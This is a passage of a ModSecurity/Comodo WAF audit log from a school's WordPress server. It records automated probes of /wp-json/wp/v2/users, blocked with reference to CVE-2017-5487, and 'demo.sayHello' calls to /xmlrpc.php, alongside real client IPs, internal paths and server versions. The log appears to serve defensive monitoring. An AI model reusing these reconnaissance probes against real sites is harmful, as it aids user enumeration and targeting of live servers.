(CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500065587075 1776 (- - -) Stopwatch2: 1747500065587075 1776; combined=968, p1=315, p2=630, p3=0, p4=0, p5=23, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ca93571-Z-- --78966f17-A-- [17/May/2025:23:41:07 +0700] aCi8IwTOsBn9MSWb6WIZqgAAAIk 103.236.140.4 50946 103.236.140.4 8181 --78966f17-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --78966f17-C-- demo.sayHello --78966f17-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78966f17-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500067073966 6063 (- - -) Stopwatch2: 1747500067073966 6063; combined=4589, p1=601, p2=3747, p3=40, p4=41, p5=96, sr=86, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78966f17-Z-- --d3470c5b-A-- [17/May/2025:23:41:14 +0700] aCi8KgTOsBn9MSWb6WIaIQAAAIU 103.236.140.4 51492 103.236.140.4 8181 --d3470c5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.25 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3470c5b-C-- demo.sayHello --d3470c5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3470c5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500074934477 4500 (- - -) Stopwatch2: 1747500074934477 4500; combined=3223, p1=564, p2=2486, p3=29, p4=27, p5=68, sr=64, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3470c5b-Z-- --1d0d9214-A-- [17/May/2025:23:41:30 +0700] aCi8OnyxdQCiyU1ENFfjngAAAAE 103.236.140.4 52570 103.236.140.4 8181 --1d0d9214-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1d0d9214-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d0d9214-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500090048318 3189 (- - -) Stopwatch2: 1747500090048318 3189; combined=1452, p1=489, p2=920, p3=0, p4=0, p5=42, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d0d9214-Z-- --af1cef62-A-- [17/May/2025:23:41:38 +0700] aCi8QnyxdQCiyU1ENFfjyQAAABI 103.236.140.4 53152 103.236.140.4 8181 --af1cef62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --af1cef62-C-- demo.sayHello --af1cef62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --af1cef62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500098155754 5135 (- - -) Stopwatch2: 1747500098155754 5135; combined=3353, p1=556, p2=2606, p3=25, p4=28, p5=80, sr=67, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af1cef62-Z-- --dbd01f5d-A-- [17/May/2025:23:42:38 +0700] aCi8fnyxdQCiyU1ENFfldwAAABA 103.236.140.4 57130 103.236.140.4 8181 --dbd01f5d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dbd01f5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbd01f5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500158480443 3054 (- - -) Stopwatch2: 1747500158480443 3054; combined=1569, p1=490, p2=1053, p3=0, p4=0, p5=26, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbd01f5d-Z-- --870c304d-A-- [17/May/2025:23:42:52 +0700] aCi8jOm4kjNN-hEbWjLo6gAAAFM 103.236.140.4 57858 103.236.140.4 8181 --870c304d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.162 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --870c304d-C-- demo.sayHello --870c304d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --870c304d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500172455405 4963 (- - -) Stopwatch2: 1747500172455405 4963; combined=3616, p1=457, p2=2972, p3=27, p4=28, p5=76, sr=58, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --870c304d-Z-- --e909e64c-A-- [17/May/2025:23:46:02 +0700] aCi9ShKi5m5upc8uMd5pwQAAANg 103.236.140.4 37898 103.236.140.4 8181 --e909e64c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e909e64c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e909e64c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500362693469 2959 (- - -) Stopwatch2: 1747500362693469 2959; combined=1495, p1=469, p2=1000, p3=0, p4=0, p5=26, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e909e64c-Z-- --67871d54-A-- [17/May/2025:23:46:13 +0700] aCi9VQTOsBn9MSWb6WIg2gAAAIU 103.236.140.4 38516 103.236.140.4 8181 --67871d54-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --67871d54-C-- demo.sayHello --67871d54-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --67871d54-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500373709725 6317 (- - -) Stopwatch2: 1747500373709725 6317; combined=5038, p1=700, p2=4066, p3=44, p4=61, p5=98, sr=60, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67871d54-Z-- --b4fe5456-A-- [17/May/2025:23:48:16 +0700] aCi90ATOsBn9MSWb6WIjZgAAAIY 103.236.140.4 43752 103.236.140.4 8181 --b4fe5456-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b4fe5456-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4fe5456-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500496628885 3281 (- - -) Stopwatch2: 1747500496628885 3281; combined=1514, p1=518, p2=961, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4fe5456-Z-- --706c0e58-A-- [17/May/2025:23:48:23 +0700] aCi91wTOsBn9MSWb6WIjwAAAAI0 103.236.140.4 44146 103.236.140.4 8181 --706c0e58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.147 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --706c0e58-C-- demo.sayHello --706c0e58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --706c0e58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500503433246 4983 (- - -) Stopwatch2: 1747500503433246 4983; combined=3559, p1=476, p2=2891, p3=29, p4=31, p5=78, sr=69, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --706c0e58-Z-- --23d61232-A-- [17/May/2025:23:56:00 +0700] aCi_oOm4kjNN-hEbWjL3dwAAAEc 103.236.140.4 41138 103.236.140.4 8181 --23d61232-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --23d61232-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23d61232-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500960262191 2309 (- - -) Stopwatch2: 1747500960262191 2309; combined=953, p1=352, p2=579, p3=0, p4=0, p5=22, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23d61232-Z-- --877b6165-A-- [17/May/2025:23:56:08 +0700] aCi_qATOsBn9MSWb6WIvngAAAJA 103.236.140.4 41596 103.236.140.4 8181 --877b6165-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.50 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --877b6165-C-- demo.sayHello --877b6165-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --877b6165-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500968600082 5255 (- - -) Stopwatch2: 1747500968600082 5255; combined=4256, p1=570, p2=3480, p3=39, p4=50, p5=71, sr=54, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --877b6165-Z-- --148dee3d-A-- [17/May/2025:23:56:14 +0700] aCi_rgTOsBn9MSWb6WIv3wAAAIM 103.236.140.4 41930 103.236.140.4 8181 --148dee3d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --148dee3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --148dee3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500974688058 2221 (- - -) Stopwatch2: 1747500974688058 2221; combined=1141, p1=385, p2=731, p3=0, p4=0, p5=25, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --148dee3d-Z-- --01ad9a08-A-- [17/May/2025:23:56:22 +0700] aCi_tum4kjNN-hEbWjL37gAAAFg 103.236.140.4 42322 103.236.140.4 8181 --01ad9a08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --01ad9a08-C-- demo.sayHello --01ad9a08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --01ad9a08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500982657075 4775 (- - -) Stopwatch2: 1747500982657075 4775; combined=3382, p1=521, p2=2671, p3=27, p4=29, p5=79, sr=60, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01ad9a08-Z-- --4d5ac57d-A-- [17/May/2025:23:56:22 +0700] aCi_tum4kjNN-hEbWjL38AAAAFM 103.236.140.4 42340 103.236.140.4 8181 --4d5ac57d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d5ac57d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d5ac57d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747500982890822 2743 (- - -) Stopwatch2: 1747500982890822 2743; combined=1238, p1=441, p2=768, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d5ac57d-Z-- --16eff404-A-- [17/May/2025:23:56:29 +0700] aCi_vXyxdQCiyU1ENFf2BQAAABY 103.236.140.4 42674 103.236.140.4 8181 --16eff404-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.253 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --16eff404-C-- demo.sayHello --16eff404-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --16eff404-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747500989751003 5917 (- - -) Stopwatch2: 1747500989751003 5917; combined=4404, p1=708, p2=3478, p3=28, p4=27, p5=94, sr=66, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16eff404-Z-- --4ac9107b-A-- [17/May/2025:23:56:56 +0700] aCi_2HyxdQCiyU1ENFf2egAAAAc 103.236.140.4 43772 103.236.140.4 8181 --4ac9107b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4ac9107b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; 